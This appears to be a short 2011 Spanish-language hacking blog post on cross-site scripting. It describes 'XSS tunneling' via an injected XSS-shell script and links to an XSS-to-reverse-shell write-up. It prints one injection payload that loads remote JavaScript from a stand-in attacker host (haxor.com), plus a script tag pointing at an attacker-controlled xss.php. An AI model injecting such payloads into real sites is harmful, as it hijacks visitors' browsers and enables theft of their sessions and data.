domingo, 11 de septiembre de 2011

Troyanizando y explotando con XSS + Ajax & JQuery

Buenas, cómo siempre yo, hago una entrada sobre Webapps. Hago un gran parentesis para decír que esta noche que he estado escribiendo me ha llegado gente que visita mi blog y de verdad les agradezco de todo corazón que quieran aprender y contactarme, por ello pongo en una barra en la derecha del modo de contacto, gracias :)

Existe una vulnerabilidad llamada XSS en las aplicaciones web, es una de las más explotadas y sinceramente hay gente que no sabe ni un carajo y empiezan a insultar a la gente que sabe porque juega mucho con el XSS. Ahora voy a desmentir a esa gente ya que me parece una estupidez que no se valoren las cosas comos son. Sí hay algún kiddie que los molesta ahí está a la derecha mi skype y mi correo para que me contacten (Jajaja, una simple bromilla)

Bueno, retomando el tema, me parece interesante el XSS. Hay muchas variaciones del XSS y explicaré aquí un poco de sus variaciones y cómo descubrir más. Primero, cómo sabemos, se necesita saber programar, por ahora Javascript, Jquery y Ajax, muy buenos lenguajes les diré, me entretiene programar en Jquery. Cómo se nota en mi título y creo que fue lo que más llamó la atención fue "Troyanizando", y exacto, pues... hay 2 formas, la primera no la explicaré, les daré un post y un video de maXe, el post anda en exploit-db, la primera vez que lo vi me fijé que es parecido a algo que había hecho ya antes, pero ahí va.

http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
Youtube video: http://www.youtube.com/watch?v=B6QAjB3kYec

Está capo, se los recomiendo, pero el más capo, el mascaporonga soy yo (Extraído del Bananero), ahora que me pasé a Windows puedo explicar con más claridad el segundo método.

XSS tunneling
Sí, XSS tunneling, consta en meter un código javascript y establecer una conexión HTTP, es una especie the MiTM, imagínemos un ARPspoof + SSLstrip.

Primero vamos a introducir con XSS el panel donde está <script language="javascript" src="xss.php"/> ó ASP cómo sea la XSShell. Y xss.php/asp va a recibir la peticion y así va a poder acceder a tu navegador.

Variantes de XSS
Claro va que vamos a ver variantes del xss, bueno, de aquí en adelante es puro código y un link de una Cheat sheet para que vean más o menos ya que no tengo mucho tiempo.

Primero inyectamos, "><script language=javascript src=http://haxor.com/js/injected.js> y ya verán que sucede si saben programar.

Por :: en

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)